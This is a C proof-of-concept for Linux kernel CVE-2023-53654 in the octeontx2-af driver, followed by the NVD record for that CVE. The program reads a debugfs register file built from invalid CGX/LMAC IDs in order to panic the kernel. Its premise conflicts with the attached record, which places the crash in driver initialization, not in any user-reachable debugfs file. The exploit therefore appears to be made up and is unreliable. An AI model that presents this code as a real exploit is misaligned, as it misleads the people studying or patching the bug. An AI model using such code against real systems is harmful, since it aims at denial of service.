CVE-2023-53654

// CVE-2023-53654 PoC - Trigger kernel panic via invalid CGX/LMAC access // This PoC demonstrates how to trigger the vulnerability by accessing // the octeontx2-af driver's sysfs/debugfs interface with invalid block IDs #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <sys/mman.h> #include <errno.h> // The vulnerability exists in cgx_lmac_read() function in // drivers/net/ethernet/marvell/octeontx2/af/rvu.c // When invalid cgx_id or lmac_id is used, kernel panic occurs #define RVU_DEBUGFS_PATH "/sys/kernel/debug/octeontx2-af/" int trigger_octeontx2_panic(int cgx_id, int lmac_id) { char path[256]; char buf[64]; int fd; ssize_t ret; // Construct path to CGX/LMAC register access interface snprintf(path, sizeof(path), "%scgx%d/lmac%d/regs", RVU_DEBUGFS_PATH, cgx_id, lmac_id); printf("[*] Attempting to access: %s\n", path); // Open the debugfs/sysfs interface for CGX/LMAC access fd = open(path, O_RDWR); if (fd < 0) { printf("[-] Failed to open %s: %s\n", path, strerror(errno)); return -1; } // Attempt to read from invalid CGX/LMAC registers // This triggers cgx_lmac_read() with out-of-range IDs memset(buf, 0, sizeof(buf)); ret = read(fd, buf, sizeof(buf)); if (ret < 0) { printf("[-] Read failed: %s\n", strerror(errno)); close(fd); return -1; } close(fd); return 0; } int main(int argc, char *argv[]) { int cgx_id = 100; // Invalid CGX ID (beyond actual hardware range) int lmac_id = 100; // Invalid LMAC ID (beyond actual hardware range) if (argc >= 3) { cgx_id = atoi(argv[1]); lmac_id = atoi(argv[2]); } printf("[*] CVE-2023-53654 PoC - octeontx2-af CGX/LMAC Access Validation Bypass\n"); printf("[*] Targeting Linux kernel octeontx2-af driver\n"); printf("[*] Invalid CGX ID: %d, Invalid LMAC ID: %d\n", cgx_id, lmac_id); // Trigger the vulnerability by accessing non-existent CGX/LMAC blocks // On vulnerable kernels, this will cause a kernel panic: // [ 23.219150] pc : cgx_lmac_read+0x38/0x70 // [ 23.219154] lr : rvu_program_channels+0x3f0/0x498 if (trigger_octeontx2_panic(cgx_id, lmac_id) == 0) { printf("[+] Access completed - check dmesg for kernel panic\n"); } return 0; }

{"cve": {"id": "CVE-2023-53654", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:48.973", "lastModified": "2026-02-03T22:24:26.357", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nocteontx2-af: Add validation before accessing cgx and lmac\n\nwith the addition of new MAC blocks like CN10K RPM and CN10KB\nRPM_USX, LMACs are noncontiguous and CGX blocks are also\nnoncontiguous. But during RVU driver initialization, the driver\nis assuming they are contiguous and trying to access\ncgx or lmac with their id which is resulting in kernel panic.\n\nThis patch fixes the issue by adding proper checks.\n\n[ 23.219150] pc : cgx_lmac_read+0x38/0x70\n[ 23.219154] lr : rvu_program_channels+0x3f0/0x498\n[ 23.223852] sp : ffff000100d6fc80\n[ 23.227158] x29: ffff000100d6fc80 x28: ffff00010009f880 x27:\n000000000000005a\n[ 23.234288] x26: ffff000102586768 x25: 0000000000002500 x24:\nfffffffffff0f000"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.12", "versionEndExcluding": "5.15.121", "matchCriteriaId": "12A35540-7F02-46C0-AC75-C86AFEB67980"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.39", "matchCriteriaId": "9BD1D4A1-304D-4187-8178-6D7C0050B1AF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.4.4", "matchCriteriaId": "A91BC267-63EE-413E-A6EF-6B96C2A278D1"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/79ebb53772c95d3a6ae51b3c65f9985fdd430df6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a5485a943193e55c79150382e6461e8ea759e96e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b04872e15f3df62cb2fd530950f769626e1ef489", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e425e2ba933618ee5ec8e4f3eb341efeb6c9ddef", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}